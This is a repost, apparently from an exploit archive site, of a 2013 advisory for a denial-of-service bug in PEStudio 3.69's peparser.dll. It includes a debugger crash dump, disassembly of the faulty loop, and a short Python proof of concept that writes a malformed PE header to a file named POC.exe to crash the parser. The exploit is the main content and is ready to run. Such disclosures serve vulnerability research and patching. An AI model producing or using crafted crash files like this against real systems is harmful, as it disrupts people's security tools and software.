首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
PEStudio 3.69 - Denial of Service
来源:https://twitter.com/debasishm89 作者:Mandal 发布时间:2013-06-06  
# Title: PEStudio Version 3.69 Denial of Service
# Date: 5th June 2013
# Author: Debasish Mandal ( https://twitter.com/debasishm89 )
# Blog : http://www.debasish.in/
# Software Homepage: http://www.winitor.com/
# Version: PEStudio Version 3.69
# Tested on: Windows XP SP2 / Windows 7
# Vendor Patch : Recently released stable version (v6.91) is not affected.

'''
 
[+] Affected Module : peparser.dll version 3.69
 
[+] Crash Point:
 
(6b4.17c): Access violation - code c0000005 (!!! second chance !!!)
eax=00000000 ebx=41414141 ecx=013f41d9 edx=013f0080 esi=00000000 edi=00004141
eip=3001ce70 esp=0012d15c ebp=00a26100 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000             efl=00000206
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Documents and Settings\debasish mandal\Desktop\Tools\PeStudio369\PeParser.dll - 
PeParser!PeParser::IPeParserFactory::Destroy+0xf1d0:
3001ce70 8b510c          mov     edx,dword ptr [ecx+0Ch] ds:0023:013f41e5=????????
0:000> u eip
PeParser!PeParser::IPeParserFactory::Destroy+0xf1d0:
3001ce70 8b510c          mov     edx,dword ptr [ecx+0Ch]
3001ce73 3bda            cmp     ebx,edx
3001ce75 7209            jb      PeParser!PeParser::IPeParserFactory::Destroy+0xf1e0 (3001ce80)
3001ce77 8b6908          mov     ebp,dword ptr [ecx+8]
3001ce7a 03ea            add     ebp,edx
3001ce7c 3bdd            cmp     ebx,ebp
3001ce7e 720c            jb      PeParser!PeParser::IPeParserFactory::Destroy+0xf1ec (3001ce8c)
3001ce80 46              inc     esi
 
[+] IDA Pro Snap of the Buggy Function:(Code from peparser.dll version 3.69)

.text:3001CE40 sub_3001CE40    proc near               ; CODE XREF: sub_30003510+154p
.text:3001CE40                                         ; sub_300184D0+4Bp
.text:3001CE40                 mov     ecx, [ecx+4]
.text:3001CE43                 xor     eax, eax
.text:3001CE45                 test    ecx, ecx
.text:3001CE47                 jz      short locret_3001CE91
.text:3001CE49                 mov     edx, [ecx+1Ch]
.text:3001CE4C                 movzx   ecx, word ptr [edx+14h]
.text:3001CE50                 lea     ecx, [ecx+edx+18h]
.text:3001CE54                 test    ecx, ecx
.text:3001CE56                 jz      short locret_3001CE91
.text:3001CE58                 test    ebx, ebx
.text:3001CE5A                 jz      short locret_3001CE91
.text:3001CE5C                 push    esi
.text:3001CE5D                 push    edi
.text:3001CE5E                 movzx   edi, word ptr [edx+6]
.text:3001CE62                 xor     esi, esi
.text:3001CE64                 test    edi, edi
.text:3001CE66                 jle     short loc_3001CE8F
.text:3001CE68                 push    ebp
.text:3001CE69                 lea     esp, [esp+0]
.text:3001CE70
.text:3001CE70 loc_3001CE70:                           ; CODE XREF: sub_3001CE40+46j
.text:3001CE70                 mov     edx, [ecx+0Ch]    <-- Crash
.text:3001CE73                 cmp     ebx, edx
.text:3001CE75                 jb      short loc_3001CE80
.text:3001CE77                 mov     ebp, [ecx+8]
.text:3001CE7A                 add     ebp, edx
.text:3001CE7C                 cmp     ebx, ebp
.text:3001CE7E                 jb      short loc_3001CE8C
.text:3001CE80
.text:3001CE80 loc_3001CE80:                           ; CODE XREF: sub_3001CE40+35j
.text:3001CE80                 inc     esi
.text:3001CE81                 add     ecx, 28h
.text:3001CE84                 cmp     esi, edi
.text:3001CE86                 jl      short loc_3001CE70
.text:3001CE88                 pop     ebp
.text:3001CE89                 pop     edi
.text:3001CE8A                 pop     esi
.text:3001CE8B                 retn
.text:3001CE8C ; ---------------------------------------------------------------------------

[+] Proof of Concept :

'''
# /usr/bin/python
header = "MZ"
header += "A"*58
header += "\x80\x00\x00\x00"
header += "A"*3
header += "\x0e"
header += "A"*60
header += "PE"
header += "A"*235
f = open('POC.exe','wb')
f.write(header)
f.close()


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Imperva SecureSphere Operation
·Exim sender_address Parameter
·DS3 Authentication Server Comm
·Mac OSX Server DirectoryServic
·Seowonintech Routers Remote Ro
·MiniUPnPd 1.0 Stack Buffer Ove
·Windows内核EPATHOBJ 0day explo
·Plesk Apache Zeroday Remote Ex
·Oracle WebCenter Content Check
·Novell Zenworks Mobile Device
·Apache Struts includeParams Re
·Hindi Browser 1.2 Denial Of Se
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved